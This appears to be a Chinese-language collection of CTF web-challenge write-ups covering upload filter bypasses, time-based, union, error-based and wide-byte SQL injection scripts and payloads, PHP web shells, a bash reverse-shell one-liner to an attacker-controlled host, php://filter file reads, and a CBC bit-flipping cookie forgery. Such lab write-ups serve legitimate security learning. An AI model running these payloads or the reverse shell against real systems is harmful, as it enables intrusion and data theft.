这道题的代码和前面的文件包含写的思路一样, 我们都是运用 php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下: 只要保证 $ac 的值 和我们写入文件 $fn 的值 一样即可, 我这里都写的是 123
这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。
结果扫到了 robots 协议的文件 robotx.txt, 访问这个文件 得到一个网页 resusl.php
然后看到这里的代码,刚开始还想绕过,试了几种 绕过 弱比较的方法,都没成功,结果想到题目的提示,需要 admin。
就将 x 的值 设为 admin, 结果成功了。 运气比较好。
这道题,真的有一些搞不懂。 我猜想是对上传文件名称进行了过滤, 所以考虑用 %00 截断绕过,但是一直没有成功,也看了一下 content-type 的值,感觉没有问题。
最终看了一下别人的wp, 才发现这个是对 content-type 的值进行大小写绕过,同时使用 php 的一下别名对 文件名进行绕过。
说一下 这个是使用的 黑名单绕过,所以我们的php 别名可以顺利绕过,如 php2, php5等。
成功得到flag:
这道题个人觉得,真的出的挺好的,因为这道题,他有很多特别之处。
一是注入点是在 headers 中的 x-forwarded-for字段;二是不同于一般的select注入,此处是 Insert into注入; 三是注入方法,这道题 只能使用 时间盲注,其余的报错注入等都会由于 explode(&ip) 这句代码给过滤掉。
关于 insert into 注入,其实本质上和 select差不多,如果想深入理解,可以看下面这篇博文:
https://blog.csdn.net/hwz2311245/article/details/53941523
然后,为什么会选择时间注入,是因为由于程序会将 逗号及其以后的语句都给过滤掉,而 时间注入 刚好整句话中都可以不带逗号,所以不会给过滤掉, 时间注入的 基本格式如下:
select case when xxx then xxx else xxx end;
从本质上来讲,时间注入就是通过爆破的方法,不断去判断我们当前猜测所输入的字符 与 flag 中的某一位的 字符 比较,然后通过返回时间的不同,来判断是不是相符。 如果相符,那么可能就 通过 sleep()函数,来使返回时间延长,然后我们一旦看到 返回时间被延长了, 那么我们就知道 这一位我们猜测正确了, 然后继续猜测下一位。
通过这种方法,我们可以不断 爆破出 数据库名, 表名, 列名, 最后 得到 flag。
我们只需要 改变上述格式中的 when 之后的语句,也就使在这里添加 查询语句。下面我放上我查询数据库名的脚本,当然我们首先也可以通过 length() 函数,去确定 数据库名有多长, 以减少爆破的次数。
# -*- coding:utf-8 -*-
import requests
import sys
data = "127.0.0.1'+(select case when substr((database()) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://120.24.86.145:8002/web15/'
result = ''
for i in range(1, 10):
print'Guessing:', str(i)
for ch in range(32, 129):
if ch == 128:
sys.exit(0)
sqli = data.format(i, chr(ch))
# print(sqli)
header = {
'X-Forwarded-For': sqli
}
try:
html = requests.get(url, headers=header, timeout=3)
except:
result += chr(ch)
print 'result: ',flag
break
上图结果,我们知道 数据库名是 web15
我们只需要改变 when 之后的 查询语句,下面我附上 我最终的 爆表, 爆列名, 爆flag的 语句:
表名:
"127.0.0.1'+(select case when substr((select table_name from information_schema.tables where table_schema=database()) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
列名:
127.0.0.1'+(select case when substr((select column_name from information_schema.columns where table_name='flag') from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
flag:
127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +
最终flag如下:
这道题正常的sql注入, 唯一难的想到的是,这里的闭合符号 是 双引号,不是通常的单引号,在这里花费了一点时间。
其他的,这道题都很友好,返回的错误信息都很完整且很详细。按照正常的sql 注入方法即可。
爆库:
1" union select database(),2 #
爆表:
1" union select table_name,2 from information_schema.tables where table_schema='bugkusql1' #
1" union select column_name,2 from information_schema.columns where table_name='flag1' #
爆flag:
1" union select flag1 from flag1 #
这道题,做的我是真的爽。非常爽。
我也学到一种新的判断过滤的方法,异或方法。
id后面输入 1’^(0)^’
,此时页面正常返回,如果换一下 ‘^(1)^’
,此时则会返回错误,那么接下来我们就可以试一下页面究竟过滤了那些关键字。比如 1’^(length(‘select’)=6)^’
测试这个select
应该是被过滤的了,实现的语句应该是 id=1'^0^0
有过滤返回正确,而无过滤的时候就会返回错误
测试得到以下关键字被过滤
select,union,or,and
我们先尝试用seselectlect
这样的形式过滤,怎么测试呢,也是刚才的语句 1’^(length(‘seselectlect’)=6)^’
这里返回了错误,说明绕过成功了, 最终我们通过此测试,发现 union select or and 被过滤了。
下面的注入就是正常注入了。但是这道题还有点坑,在于我们还得使用聚合函数,因为这道题不像前几道题,每个表里存的数据只有一个,这道题的表里存储的数据有两个,所以我们使用聚合函数,将他们一起显示出来。
聚合函数的写法,我就写一个例子供大家学习参考:
-1%27%20ununionion%20seselectlect%201,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=database()%20%23
查询到表里面有两个表:
http://120.24.86.145:9004/1ndex.php?id=-1%27%20ununionion%20seselectlect%201,group_concat(column_name)%20from%20infoorrmation_schema.columns%20where%20table_name=%27flag1%27%20%23
这里我们发现有两个字段,我就是这里被坑了一下,查询这个flag1的字段,得到一串字符串,结果老是不对,好吧,最终再来看看address,发现竟然还有下一关,好吧,我们继续开始下一关。
好吧,进入下一关,这一关我们再来看看他对什么过滤了,只需要一个简单的查询函数,我们就会发现他对 union 进行了过滤。
好吧,我们不能使用 union 了,那我们还有什么方法嘛?
这里我们可以使用 updatexml() 报错方法, 这个方法是将我们查询的东西 以报错的形式显示出来,而且他可以使用 concat() 聚合函数,所以不需要 union 。 关于这种方法,大家可以仔细学习一下原理,这也是很重要的一种注入方法。
http://120.24.86.145:9004/Once_More.php?id=1%27and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)%23
这下面,我们发现又有两个表,这里, 你可以使用 limit 限制每次只显示一个,但是这样做太麻烦了,我们可以直接使用 group_concat()函数,将所有数据一起显示出来。
http://120.24.86.145:9004/Once_More.php?id=1%27and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27web1002-2%27),0x7e),1)%23
然后,就是常规操作了,最后爆列名,我就不写了,大家可以按照我上面的列子改一改就是了。
但是看到最终的列名,我的心又是一抖,什么情况,怎么又有一个 address, WTF, 这是还有一道题吗?不管了,先查一查 flag,得到了 flag。
但是,让我们再来看看这个address里面是什么,好吧,果然还有一个地址:
我访问这个地址,需要改一改自己的IP, 改了之后得到这个 二维码,然后扫描得了几句神神秘秘的话,目前还是没搞懂,这是要我干什么,最终把这个二维码放出来,有哪位同学知道这是要我干什么的,记得告诉我呀。这题真是非常爽!
这道题是一道PHP 代码审计题,我们先来看一下程序的加密函数。
加密函数,十分明了,我们只需要按照这个加密函数 逆推 解密函数即可,下面是我写的解密函数:
这道题真的是我做的极少的使用菜刀能够连接成功的题目了,能够使用菜刀还是很爽的。
直接看题目的源码,会发现如下的 upload.php网页,访问它;
这个网页是一个正常的文件上传网页,但是只能上传图片格式的文件,那么我们试一试能不能写一句话代码,然后更改后缀名绕过这个过滤。
这里写一句话木马,我又学到两个新知识,主要是判断程序是否对我们写的一句话木马过滤,还有以JS的形式写一句话木马。
首先我们构造一个正常的一句话木马,同时,因为首页我们发现有文件包含,那么我们就可以 通过打印来判断我们的一句话木马是否被 过滤。
然后我们去查看我们刚才上传的图片:我们可以发现我们上传的一句话木马中: 被过滤,被替换成了 _ 。 那么我们就得换一种方法了。
这里我学到两种新的写法:
一种还是基于PHP,不过是变种:
上传成功后,这次我们直接使用菜刀连接,看能否连接成功:
恭喜,我们连接成功啦,接下来,我们就可以随意做我们想做的事情了,找一个flag,当然很容易啦。
第二种,我们来写一些JS类似的一句话木马:
恭喜,我们这次,已经执行了 echo 命令,那么后面的 eval() 函数,当然也能执行成功了。我们使用菜刀再连接一下,也是成功的,大家可以自行测试呀。
但是,我还看到有另一种方法,这种方法,其实就是在图片中写一句命令,当本地包含后,执行这个命令。这种方法虽然有局限性,毕竟一次只能执行一次,当然不会有菜刀那么爽了。
我们执行的是显示当前文件夹目录列表的命令:
我们发现了有一个 含有 flag的 txt 文件,我们随后访问就是了。
这道题,有一点想暴打出题人。刚开始题目提示 有hint。然后开始疯狂找hint 在哪里。
结果 hint 是传参进入的, 所以我们直接传入 ?hint=1 即可,得到程序源码。
得到了源码之后,很简单嘛,就是一个序列化操作,然后找找 $key 的值,嗯, 就在下面,好啦,应该行了吧。
结果不行, WTF???怎么会不行呢? 我们还会哪里出错?
结果,找来找去,才知道 $key的值 我们找错了。 代码下面的 $key 的值 和上面的代码 根本不是在一个 php 代码里面。
好吧,我真的看得不够仔细。 那么 上面代码 key 的值根本没有定义,所以为 NULL, 所以我们需要对 NULL 序列号操作。
然后这道题,我还发现了好玩的一点。
我用扫描器扫描时,发现了他的 phpmyadmin 网页。
然后感觉这个网站的管理员好像做题的时候,碰到过他们的 昵称呢?
尝试了 暴力破解,但还没有成功,可能信息收集还不够,大家谁有兴趣,继续下去呀。
看到题目,真的很开心,以为可以做到接近实战的题目了。
结果题目被人玩坏了,出了进入首页,其他根本不能做什么,很遗憾。
希望尽早修复吧
这道题,页面很多,也有几个很鸡肋的漏洞。
注册界面我发现一个 XSS漏洞,但是尝试了很久发现并没有任何用。
然后 通过扫描器,还发现一个 show.php, 访问之后,这里很搞笑,我先不说了。
反正这里 我也发现一个 XSS漏洞,但是也没有任何用。然后关于这道题, 搞不懂问什么花这么大力气 写这么多网页。
拿到题目,尝试了一下sql注入,感觉不像是正常的sql注入,而题目也提到了一下 union。
然后开始找找有没有其他提示,最终在 响应头里发现了 一个 tips, 是 base64加密编码,拿去解码一下。
我们看这段查询代码,主要是 通过 username去查询用户信息,然后将数据库里存储的 password的 md5值 与 我们输入的 password的经过md5加密之后的值进行比较,看是否相等。
那么我们就有了一种思路,先来看poc:
我们先将前面查询 username的语句闭合,使他查询不到任何东西。 然后我们在 后面再跟一个查询语句, 第一个查询的结果 1 这里是 username, 而第二个 md5(1) 就是我们查询出来的 password的md5值。 那么接下来 我们只需要在 password处输入 1,即可。
我们 查询出来的 password 为 md5(1) 而 我们输入的 password的 md5值也为 1, 所以此处我们就验证成功,可以登录。
登录成功后,我们发现一个远程命令执行。 那么我们来试一下能不能直接 用 bash 反弹shell。
关于getshell 的方法,大家可以参考这篇博文:https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html
所以我们 getshell的方法就是: |bash -i >& /dev/tcp/你的公网IP/你的端口 0>&1
然后我在我的服务器这边开启 nc, 开始 监听端口, 我们可以看到我们可以正常的获得shell,执行bash命令。
这道题,真的看了一下别人得WP,才知道一个新的方法。
经过我的测试,发现这道题对 空格 and 逗号 等号 进行了过滤,也就是我们得注入语句不能有这几个东西。
然后,我就开始不断尝试 绕过这几个的方法,最终失败了。这里就说一下下面的一个方法 主要是 用 括号来代替空格。
然后,最重要的一点是 这道题是一个宽字节注入。 那么我们就可以 使用 %df 类似的 来绕过对引号的转义。
最后,题目提示是一个 布尔注入,所以我们可以依靠 比较,不断将 password 给爆破出来。
既然是 布尔注入,那么总的要一个比较正确的回显和 比较错误的回显吧,我们来看看:
当我们输入的username比较是正确的时候 2>1, 他就会去比较Password是否正确,然后返回passwrod errror!
当我们输入的username比较是错误的时候 1>2, 他就会显示 username错误
所以,我们就可以根据上面两个错误回显去判断我们现在的比较是否正确。
好的,接下来我们只需要不断爆破比较password即可:
附上我写的爆破脚本:
# -*- coding:utf-8 -*-
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf8')
url = 'http://118.89.219.210:49167/index.php'
s = requests.Session()
data = "admin^'(ascii(mid((password)from({0})))>{1})#"
result =''
for i in range(1, 33):
print "Guessing:"+str(i)
for j in range(48,123):
sql=data.format(i,j)
pt={"usernmae":sql,"password":"123"}
r = s.post(url,data =pt)
if "password error!" in r.content:
result += chr(j)
print result
break
print "password:".result
得到了password,登录即可得到flag:
这道题很有迷惑性,首先我们看到界面,我猜测是一个和以前的图片上传题目类似的文件上传漏洞。
于是,开始了不断上传一句话木马,想要绕过这个,但是都失败了。
于是,在别人的提醒下,仔细看了一下url,尝试开始用php 伪协议读取。
http://120.24.86.145:9011/?op=php://filter/read=convert.base64-encode/resource=flag
最终,我们可以将flag的内容以base64加密的形式显示出来:
最终得到flag。
新题型,CBC的漏洞只在密码学的课上听过,但是却从来没有实践过,今天终于实践了一下,花了不少时间,看了很多大神的讲解,才终于能够实际操作了。
首先拿到源码,通过扫描器发现一个路径,下载下来,用 vim 打开,查看源码如下:
base64_decode('".base64_encode($plain)."') can't unserialize");
$_SESSION['username'] = $info['username'];
}else{
die("ERROR!");
}
}
}
function show_homepage(){
if ($_SESSION["username"]==='admin'){
echo $flag;
}else{
echo 'hello '.$_SESSION['username'].'
';
echo 'Only admin can see flag
';
}
echo '';
}
if(isset($_POST['username']) && isset($_POST['password'])){
$username = (string)$_POST['username'];
$password = (string)$_POST['password'];
if($username === 'admin'){
exit('admin are not allowed to login
');
}else{
$info = array('username'=>$username,'password'=>$password);
login($info);
show_homepage();
}
}else{
if(isset($_SESSION["username"])){
check_login();
show_homepage();
}else{
echo '
';
}
}
?>
简单来说:就是我们要拿到flag,就必须使自己的username 为 admin。 但是,如果我们直接通过 Post 传入 admin,会被拒绝,无法拿到flag。 那么,我们唯一的方法就是在登录之后,更改自己的cookie,使自己的 cookie 为admin。 COOKIE,中回返回两个重要的数据,一个是 IV, 一个是 cipher。 那么看到这两个数据,我们就应该很熟悉,这个 IV就是 CBC加密中的随机值, cipher是加密之后的密文。 而程序是怎么确定我们是谁的呢? 其实就是将 COOKIE中的 cipher 数据(已知) 用 随机值IV(已知) 和 密钥 key(未知)进行解密,解密出来的身份就是我们当前的用户名。
那么至此,我们就有了一个思路,我们可以更改我们cookie中 cipher值,使得我们cipher 解密出来的 username 是 admin。那么如何更改密文呢?此处,我们就需要使用 CBC字节翻转攻击。关于这个攻击,详细的大家可以查看这篇博文:
http://drops.xmd5.com/static/drops/tips-7828.html
在这里我就大致的讲一下,自己密码学学的不是太好,大家见谅:
上图便是CBC的加密方法:我们可以看到这是一个流密码加密形式,他先将明文分成相同大小的块, 第一块明文的加密,需要是使用随机值IV和密钥key,生成了第一块密文。 随后的每一块明文加密,都需要前一块的密文和密钥key。
也就是说,我们的第一块密文与IV值有关,之后的每一块密文都与前一块密文有关。而他们具体的加密方法如下:
我们可以看到他的加密算法其实很简单只是一个 异或方法。
我们再来看一下解密:
解密其实是和加密过程类似的过程。 我们可以看到解密第一块密文,只需要IV值和key。 而解密随后的所有密文,则需要前一块的密文和ksy值。
解密方法如下:
那么我们来仔细思考一下这个密码。 如果我们需要更改一个密文,使得它解密之后的明文发生变化,那么我 去更改他的前一块密文的值,是不是就可以导致这个解密后的明文发生变化。 而很重要的一点经验是: 你在密文中改变的字节,只会影响到在下一明文当中,具有相同偏移量的字节。如下图:
接下啦,那么我们具体如何修改呢:
我们根据这道题来仔细讲解一下:
我们先登录使username为 admi1, password随意,我输入 skctf
随后,我们得到了一个cookie,其中含有cipher也就是密文,还含有IV值。
这里注意,程序会将我们提交之后的username和password 序列化存储,也就是他们变成了:
a:2:{s:8:"username";s:5:"admi1";s:8:"password";s:5:"skctf";}
而在进行CBC加密时,我们输入的明文会被分成块,也就是被分成如下的块,按16字节分:
a:2:{s:8:"userna
me";s:5:"admi1";
s:8:"password";s
:5:"skctf";}
此时,我们就是要修改第二块的明文使 admi1 中的 1 变为 n。
而我们此时是知道 密文cipher 和 IV值得。
假设我们现在有一个密文A 他的正确解密明文C是 1, 他的上一个密文是B
根据上述解密算法有,A = Decrypt(Ciphertext)与B = Ciphertext-N-1异或后最终得到C = 1。等价于:
C = A XOR B
那么我们现在想使A 解密之后的明文变为 n,那么我们就可以进行如下运算:
n = A XOR B XOR C XOR n
因为A XOR B XOR C等于0。所以我们就可以在我们想要更改的明文的那一字节处采用如上的运算,那么那个字节处的明文就修改为了我们想要的值。我们现在要实现有一个新的上一个密文 B1 ,它与A 异或 为n ,也就是:
n = A XOR B1
那么 A1 就等于:
B1 = B XOR C XOR n
那么我们来看一下,如何将 admi1 修改为 admin
上面我说过一个经验公式:你在密文中改变的字节,只会影响到在下一明文当中,具有相同偏移量的字节。
上图中bs 是密文, 我们需要修个的 admi1中的 1 位于第二块明文的第13字节处,所以我们需要修改上一块密文的第 13字节:
ch = chr(ord(bs_de[13]) ^ ord('1') ^ ord('n'))
再将其与其他的密文拼接起来,那么这样我们的密文就修改成功了。
但是我们来提交以下我们的密文:
网页显示无法反序列化,是怎么了呢?我们的密文还有哪里不对?
其实是 因为我们修改了 第一块的密文,导致第一块的密文他的解密就不正确了,所以我们还得来修复一下第一块的密文。
我上面讲了,第一块密文的解密,其实是于IV值有关,而这里我们的IV值其实也是知道的。所以我们就可以采用和上面类似的方法,来修改IV值,使第一块密文的解密正确。这次我们的代码如下:
因为我们第一次修改了第一块密文的13字节处,所以此次我们需要修改IV值的第13字节。我们根据网页返回我们的base64密码解密得到此时的明文,然后用同样的翻转字节方法,更改了IV值。
随后,我们在将COOKIE中的IV值更改为我们计算出的IV值。记住,我们的IV值和cypher要在一次全部更改提交,因为每次post之后,程序返回给我们的IV值是随机值,所以我们必须保证当此所得的IV就立即修改提交。
最后我们,来看一下我们的成果:
这道题真是出的好,我也做的好爽,当然感谢很多大佬的支持和帮助。
CTF真的是一门脑力艺术,成就感很高。